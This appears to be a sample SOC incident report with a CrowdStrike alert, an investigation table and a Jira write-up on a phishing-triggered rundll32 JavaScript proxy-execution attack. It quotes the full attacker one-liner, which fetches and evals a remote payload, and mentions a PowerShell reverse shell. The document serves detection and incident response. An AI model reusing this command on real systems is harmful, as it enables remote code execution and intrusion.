CrowdStrike Alert Details
Alert ID: CS-RUNDLL32-PROXY-1218-7842 Alert Time: 2024-03-10 14:15:33 EST Severity: HIGH (85/100) Source: CrowdStrike Falcon EDR Rule: “Rundll32.exe Executing Remote JavaScript – Potential Squiblydoo” MITRE ATT&CK: T1218.011 – System Binary Proxy Execution: Rundll32
Alert Details:
Detection: Rundll32.exe executing JavaScript from remote URL
Host: ENG-WS-045 (Engineering Workstation) User: alexchen@company.com (Alex Chen, Engineer) Time: 14:10 EST
Process Tree:
explorer.exe (PID: 2341)
cmd.exe (PID: 4789)
rundll32.exe (PID: 4792)
Command: rundll32.exe javascript:”..\mshtml,RunHTMLApplication “;document.write();h=new%20ActiveXObject(“WinHttp.WinHttpRequest.5.1”);h.Open(“GET”,”http://185.143.221[.]89/payload”,false);h.Send();eval(h.responseText)
Detection Logic:
Rundll32.exe executing JavaScript (unusual)
JavaScript downloads and executes payload from remote URL
Parent process cmd.exe (unusual for rundll32)
Destination IP known malicious
Pattern matches rundll32 proxy execution
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed rundll32 JavaScript execution
2. URL Analysis
Analyze payload URL
URLScan.io, VirusTotal
Payload contains PowerShell reverse shell
3. Process Investigation
Identify source
CrowdStrike
User clicked link in email
4. User Interview
Contact alexchen
Teams, Phone
User clicked “report” link; unaware
5. Immediate Action
Terminate rundll32 process
CrowdStrike
Process killed
6. Network Block
Block malicious URL
Palo Alto, Zscaler
URL and IP blocked
Jira Incident Report
Ticket: SOC-2024-197 Summary: T1218.011 – Rundll32 JavaScript Proxy Execution Status: RESOLVED Resolution: MALICIOUS – Process Terminated Priority: P2 – MEDIUM Labels: T1218, rundll32, proxy-execution, crowdstrike, phishing Components: Endpoint-Security, Web-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Rundll32.exe Executing Remote JavaScript – Potential Squiblydoo”.
Host: ENG-WS-045 (Engineering, user alexchen).
Process: rundll32.exe with JavaScript executing remote payload.
Time: 2024-03-10 14:15 EST.
Technique: MITRE ATT&CK T1218.011 – System Binary Proxy Execution: Rundll32.
2. Technical Analysis:
Attack Chain:
14:00 – User receives phishing email with link
14:02 – User clicks link
14:03 – Browser triggers cmd.exe
14:04 – cmd.exe launches rundll32 with JavaScript
14:05 – JavaScript downloads payload from 185.143.221[.]89
14:06 – Payload executes PowerShell reverse shell
14:10 – CrowdStrike detects
Rundll32 Technique:
Binary: C:\Windows\System32\rundll32.exe (trusted)
Method: Use JavaScript: protocol to run script via mshtml.dll
Effect: Can download and execute arbitrary code, bypassing whitelisting
Payload Analysis:
URL: http://185.143.221[.]89/payload
Content: PowerShell script (reverse shell)
Impact:
PowerShell reverse shell executed
C2 connection established (blocked)
3. Investigation Findings:
Timeline:
14:00 – Email received
14:02 – Link clicked
14:04-14:06 – Payload execution
14:10 – Alert
14:12 – SOC investigates
14:13 – Process terminated
Indicators of Compromise (IoCs):
Network:
– URL: http://185.143.221[.]89/payload
– IP: 185.143.221[.]89
Processes:
– rundll32.exe with JavaScript
4. Containment Actions:
Immediate Actions:
Terminated rundll32 process.
Blocked URL and IP.
Isolated host temporarily.
Reset user password.
Host Remediation:
Full scan (clean).
No reimage needed.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link.
Contributing Factors:
No web filtering.
6. Business Impact:
Operational Impact: Engineering workstation offline for 1 hour.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
Process terminated.
User educated.
Technical Controls Enhanced:
Blocked rundll32 from executing JavaScript.
Enhanced URL filtering.
8. Conclusion:
An attacker used rundll32 to execute JavaScript and download a payload, bypassing application controls. CrowdStrike detected the anomalous process and terminated it.
Closure Rationale: Process terminated; URL blocked; user educated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-10 15:30 EST